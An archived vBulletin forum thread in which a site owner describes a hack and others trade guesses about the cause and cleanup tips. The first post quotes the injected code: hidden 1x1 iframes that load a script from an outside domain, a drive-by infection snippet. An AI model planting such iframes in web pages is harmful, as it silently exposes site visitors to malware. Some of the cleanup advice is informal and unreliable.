The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
#1
|
|||
|
|||
Anyone been hacked since 3.6.9?
I've just had a horrendous weekend trying to clean up my forum after a hacker managed to add loads of script to PHP files like this:
HTML Code:
<iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe><iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe> |
#2
|
|||
|
|||
what hacks you have in your board?
|
#3
|
|||
|
|||
Quite a few actually. I didn't realise they posed such a security risk?
|
#4
|
||||
|
||||
Sometimes they can. You need to keep up with any updates the author makes because sometimes they are security updates.
|
#5
|
|||
|
|||
If they where able to edit PHP files, then it is more likely that the server is compromised.
|
#6
|
|||
|
|||
this happened to someone i know the other day. Make sure you search your directory completely for any file with .pwd at the end. Also search your main server page for a file named _vti_(anything). Just delete all the vti folders and .pwd files if you see any. This is a way for hackers to get your passwords by typing in a certain address.
|
#7
|
||||
|
||||
Yea, pretty hard to go through vBulletin's admincp to get there
|
#8
|
||||
|
||||
you can't edit php files thru the admincp? I'm not sure if thats what you were tryin to say or not though?
|
#9
|
|||
|
|||
There are no options in default vBulletin that would allow for editing of php files.
|
#10
|
|||
|
|||
i got hacked a while ago and they edited the default template file to compromise my site and make a new page appear
|
Thread Tools | |
Display Modes | |
|
|
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
More Information | |
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|